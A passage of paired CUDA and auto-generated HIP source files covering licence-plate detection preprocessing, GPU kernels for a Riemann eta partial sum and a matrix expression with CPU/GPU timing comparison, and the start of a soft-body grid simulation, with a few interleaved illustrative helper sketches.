selections = 
alpr::nms(labels, threshold); if(selections.size() == 0) return false; alpr::detection::Label result = selections.at(0); cv::Size size = image.size(); result.points.row(0) *= size.height; result.points.row(1) *= size.width; output->first = result; output->second = this->extract_plate(image, result.points.clone(), cv::Size(240, 80)); return true; }; std::vector<alpr::detection::Label> alpr::Detection::filter_detection(cv::Size size, float* output_buffer, const nvinfer1::Dims& dims, float threshold, const int batch_size) { float side = 7.75; std::vector<float> cpu_output(output_buffer, output_buffer + alpr::get_size_by_dim(dims) * batch_size); cv::Mat transpose_matrix = (cv::Mat_<float>(3, 4) << -0.5, 0.5, 0.5, -0.5, -0.5, -0.5, 0.5, 0.5, 1.0, 1.0, 1.0, 1.0); std::vector<alpr::detection::Label> labels; size_t index = 0; for(size_t batch = 1; batch <= batch_size; batch++) { for(size_t x = 0; x < dims.d[0]; x++) { for(size_t y = 0; y < dims.d[1]; y++) { float prob = cpu_output.at(index); float data[2][3] = { {cpu_output.at(index + 2), cpu_output.at(index + 3), cpu_output.at(index + 4)}, {cpu_output.at(index + 5), cpu_output.at(index + 6), cpu_output.at(index + 7)} }; index += 8; if(prob <= threshold) continue; cv::Mat affine = cv::Mat(2, 3, CV_32F, data); affine.at<float>(0, 0) = max(affine.at<float>(0, 0), 0.0); affine.at<float>(1, 1) = max(affine.at<float>(1, 1), 0.0); cv::Mat points = affine * transpose_matrix * side; points.row(0) += float(y) + 0.5; points.row(1) += float(x) + 0.5; points.row(0) /= 1.0 * size.height / std::pow(2.0, 4); points.row(1) /= 1.0 * size.width / std::pow(2.0, 4); alpr::detection::Label label(points, prob); labels.push_back(label); } } } std::sort(labels.begin(), labels.end(), [](alpr::detection::Label label_1, alpr::detection::Label label_2) -> bool { return label_1.prob > label_2.prob; }); return labels; }; cv::Mat alpr::Detection::extract_plate(cv::Mat image, cv::Mat points, cv::Size output_size) { cv::Mat matrix; cv::vconcat(points, cv::Mat::ones(1, 4, points.type()), matrix); cv::Mat transpose_matrix = (cv::Mat_<float>(3, 4) << 0.0, output_size.width, output_size.width, 0.0, 0.0, 0.0, output_size.height, output_size.height, 1.0, 1.0, 1.0, 1.0 ); cv::Mat affine = cv::Mat::zeros(8, 9, points.type()); for(size_t i = 0; i < 4; i++) { cv::Mat x = matrix.col(i).t(); cv::Mat transpose = transpose_matrix.col(i); cv::Mat v1 = -1.0 * transpose.at<float>(2) * x; cv::Mat v2 = transpose.at<float>(1) * x; cv::Mat v3 = transpose.at<float>(2) * x; cv::Mat v4 = -1.0 * transpose.at<float>(0) * x; cv::Mat corr_row = (cv::Mat_<float>(1, 9) << 0.0, 0.0, 0.0, v1.at<float>(0), v1.at<float>(1), v1.at<float>(2), v2.at<float>(0), v2.at<float>(1), v2.at<float>(2) ); cv::Mat next_row = (cv::Mat_<float>(1, 9) << v3.at<float>(0), v3.at<float>(1), v3.at<float>(2), 0.0, 0.0, 0.0, v4.at<float>(0), v4.at<float>(1), v4.at<float>(2) ); affine.row(i * 2) += corr_row; affine.row(i * 2 + 1) += next_row; } cv::SVD svd = cv::SVD(affine, 4); cv::Mat transform; svd.vt.row(svd.vt.size().height - 1).reshape(0, 3).assignTo(transform, CV_64F); cv::Mat plate; cv::warpPerspective(image, plate, transform, output_size, 1, 0.0); cv::cvtColor(plate, plate, cv::COLOR_BGR2GRAY); cv::cvtColor(plate, plate, cv::COLOR_GRAY2BGR); return plate; }
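A minimal, self-contained sketch of the pixel packing that Detection::preprocessing performs in the files above: an 8-bit interleaved BGR (HWC) image is rewritten as a planar RGB (CHW) float tensor scaled to [0,1]. The helper name bgr_hwc_to_rgb_chw, the single-image (batch of 1) scope, and the use of std::vector instead of the TensorRT host buffer are illustrative assumptions, not part of the original sources.

// Hypothetical helper (not part of the dataset files): pack an 8-bit
// interleaved BGR image (HWC) into a planar RGB float tensor (CHW),
// scaled to [0,1] -- the same layout the preprocessing() loop writes
// into the inference host buffer.
#include <cstdint>
#include <vector>

std::vector<float> bgr_hwc_to_rgb_chw(const uint8_t* bgr, int height, int width)
{
    const int plane = height * width;          // elements per channel plane
    std::vector<float> chw(3 * plane);
    for (int j = 0; j < plane; ++j) {          // j walks over pixels
        for (int c = 0; c < 3; ++c) {          // c walks over output channels R,G,B
            // input pixel j stores B,G,R at offsets 0,1,2 -> read index (2 - c)
            chw[c * plane + j] = float(bgr[j * 3 + (2 - c)]) / 255.0f;
        }
    }
    return chw;
}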
42f29fc0be9dff0c54a388f6f56ad2c7a68dd1d8.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "device_launch_parameters.h" #include "hip/hip_complex.h" #include <vector> #include "CPUSingleThread.h" #include <math.h> #include <stdio.h> #include "cuda/std/cmath" #include <Windows.h> // Cuda Device function to calculate Complex Exponents __device__ hipDoubleComplex CuCmplxExp(double base, hipDoubleComplex exp) { hipDoubleComplex res; float r, i; sincosf(exp.y * logf(base), &i, &r); // sincosf may show up as error, but compiles with nvcc res.x = pow(base, exp.x) * r; res.y = pow(base, exp.x) * i; return res; } // Equivelant function to calculate Complex Exponents for the host device //__device__ hipDoubleComplex CuCmplxExp(double base, hipDoubleComplex exp) //{ // hipDoubleComplex res; // float r, i; // // sincosf(exp.y * logf(base), &r, &i); // res.x = base * r; // res.y = base * i; // return res; //} __global__ void addKernel(hipDoubleComplex *CudaInput, hipDoubleComplex*CudaOutput, int accuracy, int size, int KernelNum) { int i = blockDim.x * blockIdx.x + threadIdx.x + KernelNum; CudaOutput[i] = make_cuDoubleComplex(0, 0); if (i < size) { for (int c1 = 1; c1 < accuracy; c1++) { if ((c1 % 2) == 0) { CudaOutput[i] = cuCsub(CudaOutput[i], cuCdiv(make_cuDoubleComplex(1, 0), CuCmplxExp((double)c1, CudaInput[i]))); } else { CudaOutput[i] = cuCadd(CudaOutput[i], cuCdiv(make_cuDoubleComplex(1, 0), CuCmplxExp((double)c1, CudaInput[i]))); } } } } //Function to Generate Reiman Values using CUDA std::vector <RiemanPair> GenerateValuesCuda(double ymin, double ymax, double step, double accuracy) { std::vector<hipDoubleComplex> BaseValues; for (double c1 = ymin; c1 < ymax; c1 += step) { BaseValues.emplace_back(make_cuDoubleComplex(0.5, c1)); } int size = BaseValues.size(); hipDoubleComplex* InputValues = new hipDoubleComplex[BaseValues.size()]; hipDoubleComplex* ReturnValues = new hipDoubleComplex[BaseValues.size()]; InputValues = BaseValues.data(); hipDoubleComplex*CudaInput = 0; hipDoubleComplex*CudaOutput = 0; hipError_t cudaStatus; cudaStatus = hipSetDevice(0); cudaStatus = hipMalloc((void**)&CudaInput, BaseValues.size() * sizeof(hipDoubleComplex)); cudaStatus = hipMalloc((void**)&CudaOutput, BaseValues.size() * sizeof(hipDoubleComplex)); cudaStatus = hipMemcpy(CudaInput, InputValues, BaseValues.size() * sizeof(hipDoubleComplex), hipMemcpyHostToDevice); cudaStatus = hipMemcpy(CudaOutput, ReturnValues, BaseValues.size() * sizeof(hipDoubleComplex), hipMemcpyHostToDevice); for (int KernelNumber = 0; KernelNumber <= (ceil((float)BaseValues.size() / (32 * 32))); KernelNumber++) { addKernel << <32, 32 >> > (CudaInput, CudaOutput, accuracy, BaseValues.size(), (32*32)*KernelNumber); cudaStatus = hipGetLastError(); if (hipSuccess != cudaStatus) { fprintf(stderr, "Cuda error: %s.\n", hipGetErrorString(cudaStatus)); exit(EXIT_FAILURE); } } cudaStatus = hipDeviceSynchronize(); cudaStatus = hipMemcpy(ReturnValues, CudaOutput, BaseValues.size() * sizeof(hipDoubleComplex), hipMemcpyDeviceToHost); std::vector<RiemanPair> ReturnData; for (int i = 0; i < BaseValues.size(); i++) { ReturnData.emplace_back( std::complex<double>(InputValues[i].x, InputValues[i].y), std::complex<double>(ReturnValues[i].x, ReturnValues[i].y) ); } hipFree(CudaInput); hipFree(CudaOutput); return ReturnData; }
42f29fc0be9dff0c54a388f6f56ad2c7a68dd1d8.cu
 #include "cuda_runtime.h" #include "device_launch_parameters.h" #include "cuComplex.h" #include <vector> #include "CPUSingleThread.h" #include <math.h> #include <stdio.h> #include "cuda/std/cmath" #include <Windows.h> // Cuda Device function to calculate Complex Exponents __device__ cuDoubleComplex CuCmplxExp(double base, cuDoubleComplex exp) { cuDoubleComplex res; float r, i; sincosf(exp.y * logf(base), &i, &r); // sincosf may show up as error, but compiles with nvcc res.x = pow(base, exp.x) * r; res.y = pow(base, exp.x) * i; return res; } // Equivelant function to calculate Complex Exponents for the host device //__device__ cuDoubleComplex CuCmplxExp(double base, cuDoubleComplex exp) //{ // cuDoubleComplex res; // float r, i; // // sincosf(exp.y * logf(base), &r, &i); // res.x = base * r; // res.y = base * i; // return res; //} __global__ void addKernel(cuDoubleComplex *CudaInput, cuDoubleComplex*CudaOutput, int accuracy, int size, int KernelNum) { int i = blockDim.x * blockIdx.x + threadIdx.x + KernelNum; CudaOutput[i] = make_cuDoubleComplex(0, 0); if (i < size) { for (int c1 = 1; c1 < accuracy; c1++) { if ((c1 % 2) == 0) { CudaOutput[i] = cuCsub(CudaOutput[i], cuCdiv(make_cuDoubleComplex(1, 0), CuCmplxExp((double)c1, CudaInput[i]))); } else { CudaOutput[i] = cuCadd(CudaOutput[i], cuCdiv(make_cuDoubleComplex(1, 0), CuCmplxExp((double)c1, CudaInput[i]))); } } } } //Function to Generate Reiman Values using CUDA std::vector <RiemanPair> GenerateValuesCuda(double ymin, double ymax, double step, double accuracy) { std::vector<cuDoubleComplex> BaseValues; for (double c1 = ymin; c1 < ymax; c1 += step) { BaseValues.emplace_back(make_cuDoubleComplex(0.5, c1)); } int size = BaseValues.size(); cuDoubleComplex* InputValues = new cuDoubleComplex[BaseValues.size()]; cuDoubleComplex* ReturnValues = new cuDoubleComplex[BaseValues.size()]; InputValues = BaseValues.data(); cuDoubleComplex*CudaInput = 0; cuDoubleComplex*CudaOutput = 0; cudaError_t cudaStatus; cudaStatus = cudaSetDevice(0); cudaStatus = cudaMalloc((void**)&CudaInput, BaseValues.size() * sizeof(cuDoubleComplex)); cudaStatus = cudaMalloc((void**)&CudaOutput, BaseValues.size() * sizeof(cuDoubleComplex)); cudaStatus = cudaMemcpy(CudaInput, InputValues, BaseValues.size() * sizeof(cuDoubleComplex), cudaMemcpyHostToDevice); cudaStatus = cudaMemcpy(CudaOutput, ReturnValues, BaseValues.size() * sizeof(cuDoubleComplex), cudaMemcpyHostToDevice); for (int KernelNumber = 0; KernelNumber <= (ceil((float)BaseValues.size() / (32 * 32))); KernelNumber++) { addKernel << <32, 32 >> > (CudaInput, CudaOutput, accuracy, BaseValues.size(), (32*32)*KernelNumber); cudaStatus = cudaGetLastError(); if (cudaSuccess != cudaStatus) { fprintf(stderr, "Cuda error: %s.\n", cudaGetErrorString(cudaStatus)); exit(EXIT_FAILURE); } } cudaStatus = cudaDeviceSynchronize(); cudaStatus = cudaMemcpy(ReturnValues, CudaOutput, BaseValues.size() * sizeof(cuDoubleComplex), cudaMemcpyDeviceToHost); std::vector<RiemanPair> ReturnData; for (int i = 0; i < BaseValues.size(); i++) { ReturnData.emplace_back( std::complex<double>(InputValues[i].x, InputValues[i].y), std::complex<double>(ReturnValues[i].x, ReturnValues[i].y) ); } cudaFree(CudaInput); cudaFree(CudaOutput); return ReturnData; }
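For comparison only, a hedged sketch of how the chunked addKernel launches in the pair above (one launch per 32x32 block of elements, offset passed as KernelNum) could be expressed as a single grid-stride kernel. The kernel name etaPartialSum and the launch configuration are assumptions; unlike the original kernel, the output element here is only written after the i < size bounds check.

// Hypothetical alternative (not part of the dataset files): one grid-stride
// launch covering the whole input instead of re-launching per 1024-element
// chunk.  Computes the same alternating partial sum  sum_{n>=1} (-1)^(n+1) / n^s
// with s = in[i], using 1/n^s = n^(-x) * (cos(y ln n) - i sin(y ln n)).
#include <cuComplex.h>

__global__ void etaPartialSum(const cuDoubleComplex* in, cuDoubleComplex* out,
                              int accuracy, int size)
{
    for (int i = blockDim.x * blockIdx.x + threadIdx.x; i < size;
         i += blockDim.x * gridDim.x) {
        cuDoubleComplex acc = make_cuDoubleComplex(0.0, 0.0);
        for (int n = 1; n < accuracy; ++n) {
            double lnN = log((double)n);
            double mag = exp(in[i].x * lnN);               // n^x
            double ang = in[i].y * lnN;                    // y * ln n
            cuDoubleComplex term = make_cuDoubleComplex(cos(ang) / mag,
                                                        -sin(ang) / mag);
            acc = (n % 2 == 0) ? cuCsub(acc, term) : cuCadd(acc, term);
        }
        out[i] = acc;                                      // written only when i < size
    }
}
// Example launch (assumed configuration):
// etaPartialSum<<<256, 256>>>(CudaInput, CudaOutput, accuracy, size);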
9ed9b8df89bbf3d24d6338b2017c5430787aadb3.hip
// !!! This is a file automatically generated by hipify!!! #include <stdio.h> #include <stdlib.h> #include <iostream> #include <string.h> #include <time.h> #include <malloc.h> #include <hip/hip_runtime.h> #include <device_launch_parameters.h> #define FIBER 32 #define MATRIX_SIZE 2048 #define DATA_SIZE MATRIX_SIZE * MATRIX_SIZE * sizeof(int) #define MAX_MATRIX_SIZE (MATRIX_SIZE * MATRIX_SIZE) __global__ void kernel_shared(int *A, int *C, int *B, int *result) { __shared__ int shared_memory[FIBER][FIBER]; int i = blockIdx.x * blockDim.x + threadIdx.y; int j = blockIdx.y * blockDim.y + threadIdx.x; shared_memory[threadIdx.y][threadIdx.x] = B[i * MATRIX_SIZE + j]; __syncthreads(); i = blockIdx.x * blockDim.x + threadIdx.x; j = blockIdx.y * blockDim.y + threadIdx.y; int first_index = i + j * MATRIX_SIZE; int second_index = j + i * MATRIX_SIZE; if (first_index < MAX_MATRIX_SIZE && second_index < MAX_MATRIX_SIZE) { result[first_index] = (A[first_index] + A[first_index]) * shared_memory[threadIdx.x][threadIdx.y] - C[first_index]; } } __global__ void kernel(int *A, int *C, int *B, int *result) { int i = blockIdx.x * blockDim.x + threadIdx.x; int j = blockIdx.y * blockDim.y + threadIdx.y; int first_index = i + j * MATRIX_SIZE; int second_index = j + i * MATRIX_SIZE; if (first_index < MAX_MATRIX_SIZE && second_index < MAX_MATRIX_SIZE) { result[first_index] = (A[first_index] + A[first_index]) * B[second_index] - C[first_index]; } } using namespace std; int* simple_matrix_multiplication(int* A, int* B, int* C) { int *result = (int*)_aligned_malloc(DATA_SIZE, 32); for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { int first_index = i * MATRIX_SIZE + j; int second_index = j * MATRIX_SIZE + i; result[first_index] = (A[first_index] + A[first_index]) * B[second_index] - C[first_index]; } } return result; } void cuda_memory_allocation(int **pointer) { hipError_t result = hipMalloc((void**)pointer, DATA_SIZE); if (result != hipSuccess) { printf("%s\n", hipGetErrorString(result)); } } void cuda_memcpy_host_to_device(int *source, int *destination) { hipError_t result = hipMemcpy(destination, source, DATA_SIZE, hipMemcpyHostToDevice); if (result != hipSuccess) { printf("%s\n", hipGetErrorString(result)); } } void cuda_memcpy_device_to_host(int *source, int *destination) { hipError_t result = hipMemcpy(source, destination, DATA_SIZE, hipMemcpyDeviceToHost); if (result != hipSuccess) { printf("%s\n", hipGetErrorString(result)); } } bool is_matrix_equals(int *first_matrix, int *second_matrix) { for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { if (first_matrix[i * MATRIX_SIZE + j] != second_matrix[i * MATRIX_SIZE + j]) { printf("\n%d != %d [%d]\n", first_matrix[i * MATRIX_SIZE + j], second_matrix[i * MATRIX_SIZE + j], i * MATRIX_SIZE + j); return false; } } } return true; } int* fill_matrix(int *matrix) { if (matrix == NULL) { return NULL; } for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { matrix[i * MATRIX_SIZE + j] = rand() % 1000; } } return matrix; } void print_matrix(int** matrix) { for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { printf("%u\t", matrix[i][j]); if (j == MATRIX_SIZE - 1) { printf("\n"); } } } printf("\n"); printf("\n"); } int* process_matrix_cpu(int *A, int *B, int *C) { int *result; fill_matrix(A); fill_matrix(C); fill_matrix(B); clock_t start, stop; start = clock(); result = simple_matrix_multiplication(A, B, C); stop = clock(); printf("Run time CPU = %d \n", stop - start); 
return result; } int* process_matrix_gpu(int *A, int *B, int *X, bool shared) { int *device_memory; int *result = (int*)_aligned_malloc(DATA_SIZE, 32); memset(result, 0, DATA_SIZE); cuda_memory_allocation(&device_memory); cuda_memcpy_host_to_device(result, device_memory); hipEvent_t start, stop; hipEventCreate(&start); hipEventCreate(&stop); hipEventRecord(start); dim3 threads(FIBER, FIBER); dim3 blocks((MATRIX_SIZE + (FIBER - 1)) / FIBER, (MATRIX_SIZE + (FIBER - 1)) / FIBER); hipEventSynchronize(start); if (shared) { hipLaunchKernelGGL(( kernel_shared) , dim3(blocks), dim3(threads) , 0, 0, A, X, B, device_memory); } else { hipLaunchKernelGGL(( kernel) , dim3(blocks), dim3(threads) , 0, 0, A, X, B, device_memory); } hipError_t error = hipGetLastError(); if (error != hipSuccess) { printf("%s\n", hipGetErrorString(error)); } hipEventRecord(stop); hipEventSynchronize(stop); float timer = 0; hipEventElapsedTime(&timer, start, stop); if (!shared) { cout << "Run time GPU = " << timer << endl; } else { cout << "Run time GPU (shared) = " << timer << endl; } hipEventRecord(start); cuda_memcpy_device_to_host(result, device_memory); return result; } int main(int argc, char* argv[]) { int *gpu_A, *gpu_B, *gpu_C; int *gpu_shared_A, *gpu_shared_B, *gpu_shared_C; int *A, *B, *C; int *cpu_result, *gpu_result, *gpu_shared_result; A = (int*)_aligned_malloc(DATA_SIZE, 32); B = (int*)_aligned_malloc(DATA_SIZE, 32); C = (int*)_aligned_malloc(DATA_SIZE, 32); cpu_result = process_matrix_cpu(A, B, C); cuda_memory_allocation(&gpu_A); cuda_memory_allocation(&gpu_B); cuda_memory_allocation(&gpu_C); cuda_memory_allocation(&gpu_shared_A); cuda_memory_allocation(&gpu_shared_B); cuda_memory_allocation(&gpu_shared_C); cuda_memcpy_host_to_device(A, gpu_A); cuda_memcpy_host_to_device(B, gpu_B); cuda_memcpy_host_to_device(C, gpu_C); cuda_memcpy_host_to_device(A, gpu_shared_A); cuda_memcpy_host_to_device(B, gpu_shared_B); cuda_memcpy_host_to_device(C, gpu_shared_C); gpu_result = process_matrix_gpu(gpu_A, gpu_B, gpu_C, false); gpu_shared_result = process_matrix_gpu(gpu_shared_A, gpu_shared_B, gpu_shared_C, true); if (!is_matrix_equals(cpu_result, gpu_result)) { printf("Errors occured!\n"); } if (!is_matrix_equals(cpu_result, gpu_shared_result)) { printf("Error occured! (shared)\n"); } _aligned_free(A); _aligned_free(B); _aligned_free(C); _aligned_free(cpu_result); system("pause"); }
9ed9b8df89bbf3d24d6338b2017c5430787aadb3.cu
#include <stdio.h> #include <stdlib.h> #include <iostream> #include <string.h> #include <time.h> #include <malloc.h> #include <cuda_runtime.h> #include <device_launch_parameters.h> #define FIBER 32 #define MATRIX_SIZE 2048 #define DATA_SIZE MATRIX_SIZE * MATRIX_SIZE * sizeof(int) #define MAX_MATRIX_SIZE (MATRIX_SIZE * MATRIX_SIZE) __global__ void kernel_shared(int *A, int *C, int *B, int *result) { __shared__ int shared_memory[FIBER][FIBER]; int i = blockIdx.x * blockDim.x + threadIdx.y; int j = blockIdx.y * blockDim.y + threadIdx.x; shared_memory[threadIdx.y][threadIdx.x] = B[i * MATRIX_SIZE + j]; __syncthreads(); i = blockIdx.x * blockDim.x + threadIdx.x; j = blockIdx.y * blockDim.y + threadIdx.y; int first_index = i + j * MATRIX_SIZE; int second_index = j + i * MATRIX_SIZE; if (first_index < MAX_MATRIX_SIZE && second_index < MAX_MATRIX_SIZE) { result[first_index] = (A[first_index] + A[first_index]) * shared_memory[threadIdx.x][threadIdx.y] - C[first_index]; } } __global__ void kernel(int *A, int *C, int *B, int *result) { int i = blockIdx.x * blockDim.x + threadIdx.x; int j = blockIdx.y * blockDim.y + threadIdx.y; int first_index = i + j * MATRIX_SIZE; int second_index = j + i * MATRIX_SIZE; if (first_index < MAX_MATRIX_SIZE && second_index < MAX_MATRIX_SIZE) { result[first_index] = (A[first_index] + A[first_index]) * B[second_index] - C[first_index]; } } using namespace std; int* simple_matrix_multiplication(int* A, int* B, int* C) { int *result = (int*)_aligned_malloc(DATA_SIZE, 32); for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { int first_index = i * MATRIX_SIZE + j; int second_index = j * MATRIX_SIZE + i; result[first_index] = (A[first_index] + A[first_index]) * B[second_index] - C[first_index]; } } return result; } void cuda_memory_allocation(int **pointer) { cudaError_t result = cudaMalloc((void**)pointer, DATA_SIZE); if (result != cudaSuccess) { printf("%s\n", cudaGetErrorString(result)); } } void cuda_memcpy_host_to_device(int *source, int *destination) { cudaError_t result = cudaMemcpy(destination, source, DATA_SIZE, cudaMemcpyHostToDevice); if (result != cudaSuccess) { printf("%s\n", cudaGetErrorString(result)); } } void cuda_memcpy_device_to_host(int *source, int *destination) { cudaError_t result = cudaMemcpy(source, destination, DATA_SIZE, cudaMemcpyDeviceToHost); if (result != cudaSuccess) { printf("%s\n", cudaGetErrorString(result)); } } bool is_matrix_equals(int *first_matrix, int *second_matrix) { for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { if (first_matrix[i * MATRIX_SIZE + j] != second_matrix[i * MATRIX_SIZE + j]) { printf("\n%d != %d [%d]\n", first_matrix[i * MATRIX_SIZE + j], second_matrix[i * MATRIX_SIZE + j], i * MATRIX_SIZE + j); return false; } } } return true; } int* fill_matrix(int *matrix) { if (matrix == NULL) { return NULL; } for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { matrix[i * MATRIX_SIZE + j] = rand() % 1000; } } return matrix; } void print_matrix(int** matrix) { for (int i = 0; i < MATRIX_SIZE; i++) { for (int j = 0; j < MATRIX_SIZE; j++) { printf("%u\t", matrix[i][j]); if (j == MATRIX_SIZE - 1) { printf("\n"); } } } printf("\n"); printf("\n"); } int* process_matrix_cpu(int *A, int *B, int *C) { int *result; fill_matrix(A); fill_matrix(C); fill_matrix(B); clock_t start, stop; start = clock(); result = simple_matrix_multiplication(A, B, C); stop = clock(); printf("Run time CPU = %d \n", stop - start); return result; } int* process_matrix_gpu(int *A, 
int *B, int *X, bool shared) { int *device_memory; int *result = (int*)_aligned_malloc(DATA_SIZE, 32); memset(result, 0, DATA_SIZE); cuda_memory_allocation(&device_memory); cuda_memcpy_host_to_device(result, device_memory); cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); cudaEventRecord(start); dim3 threads(FIBER, FIBER); dim3 blocks((MATRIX_SIZE + (FIBER - 1)) / FIBER, (MATRIX_SIZE + (FIBER - 1)) / FIBER); cudaEventSynchronize(start); if (shared) { kernel_shared <<< blocks, threads >>> (A, X, B, device_memory); } else { kernel <<< blocks, threads >>> (A, X, B, device_memory); } cudaError_t error = cudaGetLastError(); if (error != cudaSuccess) { printf("%s\n", cudaGetErrorString(error)); } cudaEventRecord(stop); cudaEventSynchronize(stop); float timer = 0; cudaEventElapsedTime(&timer, start, stop); if (!shared) { cout << "Run time GPU = " << timer << endl; } else { cout << "Run time GPU (shared) = " << timer << endl; } cudaEventRecord(start); cuda_memcpy_device_to_host(result, device_memory); return result; } int main(int argc, char* argv[]) { int *gpu_A, *gpu_B, *gpu_C; int *gpu_shared_A, *gpu_shared_B, *gpu_shared_C; int *A, *B, *C; int *cpu_result, *gpu_result, *gpu_shared_result; A = (int*)_aligned_malloc(DATA_SIZE, 32); B = (int*)_aligned_malloc(DATA_SIZE, 32); C = (int*)_aligned_malloc(DATA_SIZE, 32); cpu_result = process_matrix_cpu(A, B, C); cuda_memory_allocation(&gpu_A); cuda_memory_allocation(&gpu_B); cuda_memory_allocation(&gpu_C); cuda_memory_allocation(&gpu_shared_A); cuda_memory_allocation(&gpu_shared_B); cuda_memory_allocation(&gpu_shared_C); cuda_memcpy_host_to_device(A, gpu_A); cuda_memcpy_host_to_device(B, gpu_B); cuda_memcpy_host_to_device(C, gpu_C); cuda_memcpy_host_to_device(A, gpu_shared_A); cuda_memcpy_host_to_device(B, gpu_shared_B); cuda_memcpy_host_to_device(C, gpu_shared_C); gpu_result = process_matrix_gpu(gpu_A, gpu_B, gpu_C, false); gpu_shared_result = process_matrix_gpu(gpu_shared_A, gpu_shared_B, gpu_shared_C, true); if (!is_matrix_equals(cpu_result, gpu_result)) { printf("Errors occured!\n"); } if (!is_matrix_equals(cpu_result, gpu_shared_result)) { printf("Error occured! (shared)\n"); } _aligned_free(A); _aligned_free(B); _aligned_free(C); _aligned_free(cpu_result); system("pause"); }
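kernel_shared in the pair above stages a 32x32 tile of B in shared memory with swapped thread indices so that both the load from B and the later access to B-transposed stay coalesced. The standalone transpose below is a hedged illustration of that tile pattern only; the kernel name transpose_tiled, the bounds guards, and the +1 padding against shared-memory bank conflicts are additions not present in the original files.

// Hypothetical illustration (not part of the dataset files): the classic
// tiled matrix transpose using the same shared-memory staging idea.
#define TILE 32

__global__ void transpose_tiled(const int* in, int* out, int n)
{
    __shared__ int tile[TILE][TILE + 1];       // +1 avoids bank conflicts

    int x = blockIdx.x * TILE + threadIdx.x;
    int y = blockIdx.y * TILE + threadIdx.y;
    if (x < n && y < n)
        tile[threadIdx.y][threadIdx.x] = in[y * n + x];    // coalesced load
    __syncthreads();

    x = blockIdx.y * TILE + threadIdx.x;       // swap block indices for the store
    y = blockIdx.x * TILE + threadIdx.y;
    if (x < n && y < n)
        out[y * n + x] = tile[threadIdx.x][threadIdx.y];   // coalesced store
}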
SoftBodyGrid3D.hip
// !!! This is a file automatically generated by hipify!!! #include "SoftBodyGrid3D.h" #include <cinder/app/AppBase.h> #include <cinder/CinderGlm.h> #include <Eigen/Dense> #include "Utils.h" #include "Integration3D.h" #include "CommonKernels.h" #include "DebugUtils.h" #include "CudaTimer.h" //For testing: set to 1 to enforce a symmetric matrix in the CG //If 0, small unsymmetries of a few ulps are in the matrix due to the ordering of the operations //If 1, the upper and lower triangular parts are averaged to create a numerically exact symmetric matrix #define MAKE_NEWMARK_SYMMETRIC 0 namespace ar3d { int3 SoftBodyGrid3D::offsets[8] = { make_int3(-1, -1, -1), make_int3(0, -1, -1), make_int3(-1, 0, -1), make_int3(0, 0, -1), make_int3(-1, -1, 0), make_int3(0, -1, 0), make_int3(-1, 0, 0), make_int3(0, 0, 0) }; void SoftBodyGrid3D::Input::assertSizes() const { assert(referenceSdf_->getGrid() == grid_); assert(posToIndex_->getGrid() == grid_); assert(numActiveCells_ > 0); assert(numActiveNodes_ > 0); assert(interpolationVolumeWeights_.rows() == numActiveCells_); assert(interpolationBoundaryWeights_.rows() == numActiveCells_); assert(surfaceNormals_.rows() == numActiveCells_); assert(dirichlet_.rows() == numActiveCells_); assert(mapping_.rows() == numActiveCells_); assert(referencePositions_.rows() == numActiveNodes_); //assert(sparsityPattern_.cols == numActiveNodes_); //assert(sparsityPattern_.rows == numActiveNodes_); } SoftBodyGrid3D::State SoftBodyGrid3D::State::deepClone() const { State s; s.displacements_ = displacements_.deepClone(); s.velocities_ = velocities_.deepClone(); s.advectedBoundingBox_ = advectedBoundingBox_; s.gridDisplacements_ = gridDisplacements_.deepClone(); if (advectedSDF_) { s.advectedSDF_ = std::make_shared<WorldGridData<real>>(advectedSDF_->getGrid()); s.advectedSDF_->setDeviceMemory(advectedSDF_->getDeviceMemory().deepClone()); } return s; } WorldGridPtr SoftBodyGrid3D::createGridFromBoundingBox( const ar::geom3d::AABBBox boundingBox, int resolution, int border) { Eigen::Vector3i offset = (boundingBox.min.array() * resolution).floor().cast<int>() - border; Eigen::Vector3i size = ((boundingBox.max - boundingBox.min).array() * resolution).ceil().cast<int>() + (2 * border); return std::make_shared<WorldGrid>(resolution, offset, size); } void SoftBodyGrid3D::setupInput1Grid(Input& input, real3 center, real3 halfsize, int resolution, int border) { Eigen::Vector3d bbmin(center.x - halfsize.x, center.y - halfsize.y, center.z - halfsize.z); Eigen::Vector3d bbmax(center.x + halfsize.x, center.y + halfsize.y, center.z + halfsize.z); input.grid_ = createGridFromBoundingBox(ar::geom3d::AABBBox(bbmin, bbmax), resolution, border); } void SoftBodyGrid3D::setupInput2Sdf(Input& input, std::function<real(real3)> posToSdf) { input.referenceSdf_ = std::make_shared<WorldGridData<real>>(input.grid_); input.referenceSdf_->allocateHostMemory(); const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); for (int z=0; z<size.z(); ++z) for (int y=0; y<size.y(); ++y) for (int x=0; x<size.x(); ++x) { real3 pos = make_real3( (offset.x() + x) / real(input.grid_->getVoxelResolution()), (offset.y() + y) / real(input.grid_->getVoxelResolution()), (offset.z() + z) / real(input.grid_->getVoxelResolution()) ); input.referenceSdf_->atHost(x, y, z) = posToSdf(pos); } } void SoftBodyGrid3D::setupInput3Mapping(Input& input, int diffusionDistance) { bool noDiffusionLimit = diffusionDistance <= 0; const auto& size = input.grid_->getSize(); const auto& offset = 
